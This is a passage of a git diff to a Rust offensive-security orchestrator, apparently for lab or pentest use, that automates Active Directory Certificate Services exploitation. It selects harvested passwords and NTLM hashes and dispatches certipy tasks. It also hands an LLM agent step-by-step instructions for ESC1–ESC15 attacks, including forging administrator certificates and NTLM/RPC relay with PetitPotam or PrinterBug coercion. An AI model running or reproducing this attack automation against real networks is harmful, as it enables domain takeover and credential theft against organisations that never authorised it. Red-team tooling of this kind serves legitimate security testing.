!h.domain.is_empty() + }), + ); + candidates.extend( + state + .hashes + .iter() + .filter(pred_any_xdom) + .filter(|h| h.username.to_lowercase() != "administrator"), + ); + candidates + .into_iter() + .find(|h| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_hash(&s.host, h))) + .cloned() + } else { + None + }; + let (ntlm_hash, ntlm_hash_username) = match &hash_pick { + Some(h) => (Some(h.hash_value.clone()), Some(h.username.clone())), + None => (None, None), + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + return None; + } + + let dedup_key = match (&cred, &hash_pick) { + (Some(c), _) => dedup_key_cred(&s.host, c), + (None, Some(h)) => dedup_key_hash(&s.host, h), + (None, None) => return None, + }; + + Some(AdcsWork { + host_ip: s.host.clone(), + dedup_key, + dc_ip, + domain: domain.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain, + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }) + }) + .collect() +} + /// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. /// Interval: 30s. Matches Python `_auto_adcs_enumeration`. pub async fn auto_adcs_enumeration( @@ -35,78 +259,70 @@ pub async fn auto_adcs_enumeration( break; } - // Find CertEnroll shares on unprocessed hosts + get a credential - let work: Vec<(String, String, ares_core::models::Credential)> = { + let work = { let state = dispatcher.state.read().await; - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => c.clone(), - None => continue, - }; - state + let creds = state.credentials.len(); + let hashes = state.hashes.len(); + let certenroll_shares: Vec<_> = state .shares .iter() .filter(|s| s.name.to_lowercase() == "certenroll") - .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) - .filter_map(|s| { - // Resolve the domain for this ADCS host by matching the - // host's FQDN against known domains, or finding which DC - // subnet the host belongs to. Falls back to first domain. - let host_lower = s.host.to_lowercase(); - let domain = state - .hosts - .iter() - .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower) - .and_then(|h| extract_domain_from_fqdn(&h.hostname)) - .and_then(|d| { - // Verify it's a known domain - if state.domains.iter().any(|known| known.to_lowercase() == d) { - Some(d) - } else { - // Try parent match (e.g. child.contoso.local → contoso.local) - state - .domains - .iter() - .find(|known| { - d.ends_with(&format!(".{}", known.to_lowercase())) - }) - .or_else(|| { - state.domains.iter().find(|known| { - known.to_lowercase().ends_with(&format!(".{d}")) - }) - }) - .cloned() - .or(Some(d)) - } - }) - .or_else(|| state.domains.first().cloned())?; - Some((s.host.clone(), domain, cred.clone())) - }) - .collect() + .collect(); + let ce_count = certenroll_shares.len(); + let ce_hosts: Vec<_> = certenroll_shares.iter().map(|s| s.host.as_str()).collect(); + let cred_domains: Vec<_> = state + .credentials + .iter() + .map(|c| c.domain.as_str()) + .collect(); + let hash_domains: Vec<_> = state.hashes.iter().map(|h| h.domain.as_str()).collect(); + let domains: Vec<_> = state.domains.iter().map(|d| d.as_str()).collect(); + let w = collect_adcs_work(&state); + info!( + creds, + hashes, + certenroll_shares = ce_count, + ?ce_hosts, + ?cred_domains, + ?hash_domains, + ?domains, + work_items = w.len(), + "auto_adcs_enumeration: tick" + ); + w }; - for (host_ip, domain, cred) in work { + for item in work { + // Use DC IP for certipy LDAP queries; fall back to CA host IP + let target_ip = item.dc_ip.as_deref().unwrap_or(&item.host_ip); + // Pass CA host IP separately so the parser sets the correct vuln target + // (the CA server, not the DC used for LDAP). + let ca_host_ip = if item.dc_ip.is_some() { + Some(item.host_ip.as_str()) + } else { + None + }; match dispatcher - .request_certipy_find(&host_ip, &domain, &cred) + .request_certipy_find( + target_ip, + &item.domain, + &item.credential, + item.ntlm_hash.as_deref(), + item.ntlm_hash_username.as_deref(), + ca_host_ip, + ) .await { Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); + info!(task_id = %task_id, host = %item.host_ip, dc_ip = ?item.dc_ip, "ADCS enumeration dispatched"); dispatcher .state .write() .await - .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); + .mark_processed(DEDUP_ADCS_SERVERS, item.dedup_key.clone()); let _ = dispatcher .state - .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) + .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &item.dedup_key) .await; } Ok(None) => {} @@ -119,6 +335,259 @@ pub async fn auto_adcs_enumeration( #[cfg(test)] mod tests { use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + // --- collect_adcs_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_certenroll_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.50"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + let cred = make_credential("admin", "P@ssw0rd!", "contoso.local"); // pragma: allowlist secret + state.credentials.push(cred.clone()); + // Mark the identity-aware dedup key for the only candidate cred. + state.mark_processed(DEDUP_ADCS_SERVERS, dedup_key_cred("192.168.58.50", &cred)); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_certenroll_share_ignored() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "SYSVOL")); + state + .hosts + .push(make_host("192.168.58.50", "dc01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.fabrikam.local", false)); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabadmin"); + } + + #[test] + fn collect_falls_back_to_first_domain_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + // No matching host in state.hosts + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "certenroll")); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_multiple_adcs_hosts() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_cross_forest_cred_for_ca_host() { + // contoso.local CA, only fabrikam.local cred (different forest). + // certipy_find LDAP bind across forest trust fails 52e — skip dispatch. + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("foreigner", "P@ss!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "should not dispatch ADCS enum with cross-forest cred" + ); + } + + #[test] + fn collect_uses_child_domain_cred_for_parent_ca() { + // child cred → parent CA: same forest, LDAP bind succeeds. + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("childuser", "P@ss!", "dev.contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "childuser"); + } + + #[test] + fn collect_quarantined_same_domain_does_not_fall_back_cross_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "cross-forest LDAP bind fails 52e — must not dispatch with fabrikam cred" + ); + } + + #[test] + fn collect_quarantined_same_domain_falls_back_to_sibling_in_same_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "dev.contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } #[test] fn extract_domain_from_fqdn_typical() { @@ -159,4 +628,70 @@ mod tests { // "host." splits into ("host", "") -> Some("") assert_eq!(extract_domain_from_fqdn("host."), Some("".to_string())); } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ADCS_SERVERS, "adcs_servers"); + } + + #[test] + fn certenroll_share_name_match() { + let share_name = "CertEnroll"; + assert_eq!(share_name.to_lowercase(), "certenroll"); + } + + #[test] + fn certenroll_case_insensitive() { + let names = vec!["CertEnroll", "certenroll", "CERTENROLL"]; + for name in names { + assert_eq!(name.to_lowercase(), "certenroll"); + } + } + + #[test] + fn domain_resolution_from_fqdn() { + // Verifies domain extraction works for typical ADCS hosts + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + assert_eq!( + extract_domain_from_fqdn("ca01.fabrikam.local"), + Some("fabrikam.local".to_string()) + ); + } + + #[test] + fn credential_selection_prefers_same_domain() { + let creds = [ + ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ares_core::models::Credential { + id: "c2".into(), + username: "admin2".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ]; + let target_domain = "fabrikam.local"; + let selected = creds.iter().find(|c| { + !c.password.is_empty() && c.domain.to_lowercase() == target_domain.to_lowercase() + }); + assert!(selected.is_some()); + assert_eq!(selected.unwrap().domain, "fabrikam.local"); + } } diff --git a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs index 124c9c2f..e65cbb07 100644 --- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs +++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs @@ -23,22 +23,48 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit"; /// ADCS vulnerability types we know how to exploit. -const EXPLOITABLE_ESC_TYPES: &[&str] = &[ +/// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool) +/// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain) +/// ESC7: ManageCA abuse (certipy_esc7_full_chain: add-officer → SubCA → issue → retrieve → auth) +/// ESC8: NTLM relay to HTTP web enrollment (coercion role) +/// ESC9/13: certipy req with specific flags +/// ESC10: Weak certificate mapping (StrongCertificateBindingEnforcement=0), certipy req -sid +/// ESC11: RPC relay to ICPR enrollment (certipy relay -target rpc://, coercion role) +/// ESC15: Application policy OID abuse (certipy req -application-policies) +pub(crate) const EXPLOITABLE_ESC_TYPES: &[&str] = &[ "esc1", + "esc2", + "esc3", "esc4", + "esc6", + "esc7", "esc8", + "esc9", + "esc10", + "esc11", + "esc13", + "esc15", "adcs_esc1", + "adcs_esc2", + "adcs_esc3", "adcs_esc4", + "adcs_esc6", + "adcs_esc7", "adcs_esc8", + "adcs_esc9", + "adcs_esc10", + "adcs_esc11", + "adcs_esc13", + "adcs_esc15", ]; /// Monitors for discovered ADCS vulnerabilities and dispatches exploitation tasks. -/// Interval: 30s. +/// Interval: 5s. pub async fn auto_adcs_exploitation( dispatcher: Arc, mut shutdown: watch::Receiver, ) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); + let mut interval = tokio::time::interval(Duration::from_secs(5)); interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); loop { @@ -104,44 +130,63 @@ pub async fn auto_adcs_exploitation( .unwrap_or("") .to_string(); - let ca_host = extract_ca_host(&vuln.details, &vuln.target); + let ca_host = extract_ca_host(&vuln.details, &vuln.target).or_else(|| { + // When the parser couldn't determine the CA host (empty target), + // resolve it from the CertEnroll share for this domain. + resolve_ca_host_from_shares(&state.shares, &state.hosts, &domain) + }); // For ESC4, we need the account with GenericAll on the template let account_name = extract_account_name(&vuln.details); // Find a credential for exploitation. - // For ESC4, prefer the account that has GenericAll on the template. - // For ESC1/ESC8, any authenticated user in the domain works. - let credential = account_name + // For ESC4, prefer the account that has GenericAll on the + // template (it may live in a different domain than the CA + // — cross-forest ACL edge — so use the source-cred helper). + // For ESC1/ESC8/etc, any authenticated user in the CA's + // domain works; cross-forest ESC8 also accepts a credential + // from a trusting domain because the relay path doesn't + // need same-domain auth (the cert is issued to whatever + // principal lands on the relay). + let account_cred = account_name .as_ref() - .and_then(|acct| { - state.credentials.iter().find(|c| { - c.username.to_lowercase() == acct.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) + .and_then(|acct| state.find_source_credential(acct, &domain)); + + let same_domain_cred = if !domain.is_empty() { + state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) }) - }) - .or_else(|| { - // Fall back to any credential for this domain - if !domain.is_empty() { - state.credentials.iter().find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } else { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } - }) - .cloned(); + .cloned() + } else { + state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned() + }; + + let trust_cred = if same_domain_cred.is_none() && !domain.is_empty() { + state.find_trust_credential(&domain) + } else { + None + }; + + let credential = account_cred.or(same_domain_cred).or(trust_cred); if credential.is_none() { - debug!( + info!( vuln_id = %vuln.vuln_id, esc_type = %esc_type, "ADCS exploit skipped: no credential available" @@ -154,6 +199,22 @@ pub async fn auto_adcs_exploitation( .get(&domain.to_lowercase()) .cloned(); + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + // For coercion-based ESC paths (esc8/esc11), build a + // tier-ordered candidate list of coerce targets so the LLM + // agent can iterate when the first one's callback drifts. + let coerce_candidates = if matches!(esc_type.as_str(), "esc8" | "esc11") { + pick_coerce_targets( + ca_host.as_deref(), + dc_ip.as_deref(), + &state.domain_controllers, + &state.hosts, + ) + } else { + Vec::new() + }; + Some(AdcsExploitWork { vuln_id: vuln.vuln_id.clone(), dedup_key, @@ -163,13 +224,49 @@ pub async fn auto_adcs_exploitation( ca_host, domain, dc_ip, + domain_sid, credential, + coerce_candidates, }) }) .collect() }; for item in work { + let role = role_for_esc_type(&item.esc_type); + + // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and + // a coerce target that is not the CA itself — Windows NTLM + // same-machine loopback protection blocks relay back to the + // coerced host. Without these, the dispatched task cannot succeed. + let (coerce_target, coerce_targets, listener_ip) = if role == "coercion" { + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + "ADCS coercion exploit skipped: no listener_ip configured" + ); + continue; + } + }; + if item.coerce_candidates.is_empty() { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + ca_host = ?item.ca_host, + "ADCS coercion exploit skipped: no coerce target distinct from ca_host" + ); + continue; + } + let primary = item.coerce_candidates[0].clone(); + let all = item.coerce_candidates.clone(); + (Some(primary), Some(all), Some(listener)) + } else { + (None, None, None) + }; + let mut payload = json!({ "technique": format!("adcs_{}", item.esc_type), "vuln_type": format!("adcs_{}", item.esc_type), @@ -177,6 +274,7 @@ pub async fn auto_adcs_exploitation( "esc_type": item.esc_type, "domain": item.domain, "impersonate": "administrator", + "instructions": esc_instructions(&item.esc_type), }); if let Some(ref ca) = item.ca_name { @@ -192,6 +290,23 @@ pub async fn auto_adcs_exploitation( if let Some(ref dc) = item.dc_ip { payload["dc_ip"] = json!(dc); } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + // Administrator RID is always 500 + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + if let Some(ref ip) = listener_ip { + payload["listener_ip"] = json!(ip); + } + if let Some(ref t) = coerce_target { + payload["coerce_target"] = json!(t); + } + if let Some(ref ts) = coerce_targets { + if !ts.is_empty() { + payload["coerce_targets"] = json!(ts); + } + } if let Some(ref cred) = item.credential { payload["username"] = json!(cred.username); @@ -203,10 +318,6 @@ pub async fn auto_adcs_exploitation( }); } - // ESC8 uses coercion+relay, dispatch to coercion role. - // ESC1/ESC4 use certipy directly, dispatch to privesc role. - let role = role_for_esc_type(&item.esc_type); - let priority = dispatcher.effective_priority(&format!("adcs_{}", item.esc_type)); match dispatcher .throttled_submit("exploit", role, payload, priority) @@ -300,13 +411,190 @@ fn extract_account_name( .map(|s| s.to_string()) } +/// Resolve CA host IP from CertEnroll shares when the vuln has no target. +/// Looks for a CertEnroll share whose host belongs to the given domain. +/// Falls back to any CertEnroll share if no domain-matched share is found. +fn resolve_ca_host_from_shares( + shares: &[ares_core::models::Share], + hosts: &[ares_core::models::Host], + domain: &str, +) -> Option { + let certenroll_shares: Vec<_> = shares + .iter() + .filter(|s| s.name.to_lowercase() == "certenroll") + .collect(); + + if certenroll_shares.is_empty() { + return None; + } + + // Try domain-matched share first + if !domain.is_empty() { + let domain_lower = domain.to_lowercase(); + if let Some(s) = certenroll_shares.iter().find(|s| { + hosts.iter().any(|h| { + (h.ip == s.host || h.hostname.to_lowercase() == s.host.to_lowercase()) + && h.hostname.to_lowercase().ends_with(&domain_lower) + }) + }) { + return Some(s.host.clone()); + } + } + + // Fall back to any CertEnroll share (likely the CA for this environment) + certenroll_shares.first().map(|s| s.host.clone()) +} + +/// Build a tier-ordered list of viable coerce targets for ESC8/ESC11, +/// excluding the CA host (Windows NTLM same-machine loopback blocks relay +/// back to the coerced host). Tiers: (1) the vuln-domain DC, (2) any other +/// DCs in state, (3) Windows member servers in state. The agent iterates +/// the list when an earlier candidate's callback drifts (a real lab +/// failure mode — see `relay_and_coerce_validation.md`). Comparison against +/// `ca_host` is case-insensitive. +fn pick_coerce_targets( + ca_host: Option<&str>, + dc_ip: Option<&str>, + domain_controllers: &std::collections::HashMap, + hosts: &[ares_core::models::Host], +) -> Vec { + let ca_lower = ca_host.map(str::to_lowercase); + let mut out: Vec = Vec::new(); + let push_unique = |out: &mut Vec, candidate: &str| { + if candidate.is_empty() { + return; + } + let cand_lower = candidate.to_lowercase(); + if ca_lower.as_deref() == Some(cand_lower.as_str()) { + return; + } + if !out.iter().any(|e| e.to_lowercase() == cand_lower) { + out.push(candidate.to_string()); + } + }; + + // Tier 1: vuln-domain DC. + if let Some(dc) = dc_ip { + push_unique(&mut out, dc); + } + // Tier 2: other DCs in state (cross-domain coercion is fine for ESC8 — + // the CA accepts any authenticated machine account). + for ip in domain_controllers.values() { + push_unique(&mut out, ip); + } + // Tier 3: Windows member servers (bypass DC callback drift). We check + // both the OS string and SMB service exposure since `os` is not always + // populated. + for h in hosts { + if h.is_dc { + continue; + } + let is_windows = h.os.to_lowercase().contains("windows") + || h.services.iter().any(|s| { + let s = s.to_lowercase(); + s.contains("microsoft-ds") || s.contains("netbios-ssn") + }); + if is_windows { + push_unique(&mut out, &h.ip); + } + } + + out +} + /// Determine the dispatch role for a given ESC type. -/// ESC8 uses coercion+relay (coercion role), while ESC1/ESC4 use certipy directly (privesc role). +/// ESC8 uses coercion+relay (coercion role), while all others use certipy directly (privesc role). fn role_for_esc_type(esc_type: &str) -> &'static str { - if esc_type == "esc8" { - "coercion" - } else { - "privesc" + match esc_type { + "esc8" | "esc11" => "coercion", + _ => "privesc", + } +} + +/// Return ESC-type-specific exploitation instructions for the LLM agent. +fn esc_instructions(esc_type: &str) -> &'static str { + match esc_type { + "esc1" => concat!( + "ESC1: Enrollee supplies Subject Alternative Name (SAN).\n", + "Use certipy_request with template, ca (CA name), upn='administrator@',\n", + "dc_ip (domain controller), target (CA server IP from ca_host field),\n", + "and sid (use admin_sid from payload, e.g. S-1-5-21-...-500).\n", + "IMPORTANT: The 'target' param MUST be the CA server (ca_host), NOT the DC.\n", + "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n", + "Then use certipy_auth with the resulting .pfx to get the NT hash." + ), + "esc2" => concat!( + "ESC2: Any Purpose EKU allows client auth.\n", + "Use certipy_request with template, ca, dc_ip, target=ca_host, and sid=admin_sid.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc3" => concat!( + "ESC3: Certificate Request Agent (enrollment agent).\n", + "Step 1: certipy_request the CRA template with target=ca_host.\n", + "Step 2: Use that cert to request a cert on behalf of administrator.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip." + ), + "esc4" => concat!( + "ESC4: Template ACL abuse — attacker has GenericAll on a template.\n", + "Use certipy_esc4_full_chain which modifies the template to be ESC1-vulnerable,\n", + "requests a cert as administrator, then restores the original template.\n", + "IMPORTANT: Set target to the ca_host IP for certificate enrollment." + ), + "esc6" => concat!( + "ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA.\n", + "Use certipy_request with any template that allows client auth,\n", + "adding upn='administrator@', target=ca_host, and sid=admin_sid.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc7" => concat!( + "ESC7: ManageCA privilege abuse.\n", + "Use certipy_esc7_full_chain to execute the full chain: add-officer → request SubCA cert (denied) → issue pending request → retrieve cert → authenticate.\n", + "IMPORTANT: Set target to the ca_host IP (CA server, not DC).\n", + "IMPORTANT: Include 'sid' param (admin_sid from payload) to avoid SID mismatch in certipy v5.\n", + "The tool handles all 5 steps automatically and returns the NT hash." + ), + "esc9" => concat!( + "ESC9: GenericAll on a user allows UPN spoofing.\n", + "If you have GenericAll on a user, change their UPN to administrator@,\n", + "request a cert using the modified user, then restore the original UPN.\n", + "Use certipy_request (with target=ca_host) then certipy_auth.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip." + ), + "esc10" => concat!( + "ESC10: Weak Certificate Mapping (StrongCertificateBindingEnforcement=0).\n", + "The DC does not enforce strong cert-to-account binding.\n", + "Use certipy_request with template, ca, target=ca_host, and sid=admin_sid.\n", + "The -sid flag embeds the target SID in the cert, bypassing weak mapping.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc11" => concat!( + "ESC11: RPC relay to ICPR certificate enrollment (IF_ENFORCEENCRYPTICERTREQUEST disabled).\n", + "Use certipy_relay with target='rpc://' and ca=.\n", + "This starts a relay listener that accepts coerced NTLM auth and relays it\n", + "to the CA's RPC enrollment endpoint to obtain a certificate.\n", + "Combine with coercion (PetitPotam, PrinterBug) to trigger auth from a DC.\n", + "After relay captures a cert, use certipy_auth with the .pfx." + ), + "esc13" => concat!( + "ESC13: Issuance Policy linked to a group.\n", + "Use certipy_request with the ESC13 template and target=ca_host.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc15" => concat!( + "ESC15 (CVE-2024-49019): Application policy OID abuse.\n", + "Use certipy_request with template, ca, target=ca_host,\n", + "and application_policies= (e.g. '1.3.6.1.5.5.7.3.2' for Client Authentication).\n", + "The application policy OID overrides the template's EKU restrictions.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "Then use certipy_auth with the resulting .pfx." + ), + _ => "Use certipy_request with the template and CA, then certipy_auth with the .pfx. Set target to ca_host.", } } @@ -319,7 +607,13 @@ struct AdcsExploitWork { ca_host: Option, domain: String, dc_ip: Option, + domain_sid: Option, credential: Option, + /// Tier-ordered coerce target candidates (esc8/esc11 only). Empty for + /// non-coercion ESC types. The dispatcher passes the first as + /// `coerce_target` (legacy) and the full list as `coerce_targets` so the + /// agent can iterate when the first target's callback drifts. + coerce_candidates: Vec, } #[cfg(test)] @@ -353,11 +647,29 @@ mod tests { #[test] fn is_exploitable_esc_type_positive() { assert!(is_exploitable_esc_type("esc1")); + assert!(is_exploitable_esc_type("esc2")); + assert!(is_exploitable_esc_type("esc3")); assert!(is_exploitable_esc_type("esc4")); + assert!(is_exploitable_esc_type("esc6")); + assert!(is_exploitable_esc_type("esc7")); assert!(is_exploitable_esc_type("esc8")); + assert!(is_exploitable_esc_type("esc9")); + assert!(is_exploitable_esc_type("esc10")); + assert!(is_exploitable_esc_type("esc11")); + assert!(is_exploitable_esc_type("esc13")); + assert!(is_exploitable_esc_type("esc15")); assert!(is_exploitable_esc_type("adcs_esc1")); + assert!(is_exploitable_esc_type("adcs_esc2")); + assert!(is_exploitable_esc_type("adcs_esc3")); assert!(is_exploitable_esc_type("adcs_esc4")); + assert!(is_exploitable_esc_type("adcs_esc6")); + assert!(is_exploitable_esc_type("adcs_esc7")); assert!(is_exploitable_esc_type("adcs_esc8")); + assert!(is_exploitable_esc_type("adcs_esc9")); + assert!(is_exploitable_esc_type("adcs_esc10")); + assert!(is_exploitable_esc_type("adcs_esc11")); + assert!(is_exploitable_esc_type("adcs_esc13")); + assert!(is_exploitable_esc_type("adcs_esc15")); } #[test] @@ -370,13 +682,13 @@ mod tests { #[test] fn is_exploitable_esc_type_negative() { - assert!(!is_exploitable_esc_type("esc2")); - 